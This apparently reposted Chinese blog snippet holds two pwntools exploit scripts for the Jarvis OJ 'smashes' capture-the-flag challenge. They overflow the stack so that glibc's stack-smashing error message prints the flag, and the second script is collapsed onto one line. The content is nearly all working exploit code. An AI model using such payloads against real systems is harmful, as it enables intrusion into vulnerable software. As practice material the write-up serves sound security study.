标签:ack 玩法 deb libc space proc rom ash 栈溢出
from pwn import *
old_flag_addr = 0x600d20
new_flag_addr = 0x400d20
#p = process(‘./smashes‘)
p = remote(‘pwn.jarvisoj.com‘, 9877)
p.recvuntil("name?")
payload = "a"*0x218 + p64(new_flag_addr)
payload += p64(0) + p64(old_flag_addr)
p.sendline(payload)
p.recvuntil("flag: ")
env = "LIBC_FATAL_STDERR_=1"
p.sendline(env)
flag = p.recv()
print flag
from pwn import * context.log_level = ‘debug‘ cn = remote(‘pwn.jarvisoj.com‘, 9877) # cn = process(‘smashes‘) cn.recv() cn.sendline(p64(0x0400d20)*300) cn.recv() cn.sendline() cn.recv()
标签:ack 玩法 deb libc space proc rom ash 栈溢出
原文地址:http://www.cnblogs.com/elvirangel/p/6863206.html
